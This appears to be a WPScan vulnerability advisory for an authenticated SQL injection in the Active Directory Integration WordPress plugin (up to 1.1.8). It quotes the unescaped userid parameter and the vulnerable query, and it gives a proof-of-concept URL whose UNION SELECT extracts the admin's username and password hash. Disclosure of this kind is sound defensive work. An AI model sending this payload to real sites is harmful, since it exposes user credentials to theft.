Active Directory Integration <= 1.1.8 - Authenticated SQL Injection



Description
Type user acces: administrator user.
Target need have configured ldap and active.

Path Request: /wp-content/plugins/active-directory-integration/syncback.php

Line :  135
$result = $ADI->bulksyncback( $_GET['userid'] );


$_GET[‘userid’] is not escaped.


Path Method: /wp-content/plugins/active-directory-integration/BulkSyncBackADIntegrationPlugin.class.php

Line: 142
$wpdb->get_results("SELECT user_id FROM $wpdb->usermeta WHERE meta_key = 'adi_samaccountname' AND meta_value <> '' AND user_id <> 1 AND user_id = $userid");
Proof of Concept
target.dev/wp-content/plugins/active-directory-integration/syncback.php?userid=1+UNION+SELECT+CONCAT(user_login,char(58),user_pass)+FROM+wp_users+WHERE+ID=1

Affects Plugin

References

URL http://lenonleite.com.br/en/blog/2017/09/11/english-active-directory-integration-wordpress-plugin-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 5657
Verified No
WPVDB ID 8952

Timeline

Publicly Published 2017-11-03 (about 2 years ago)
Added 2017-11-12 (about 2 years ago)
Last Updated 2019-11-01 (about 2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin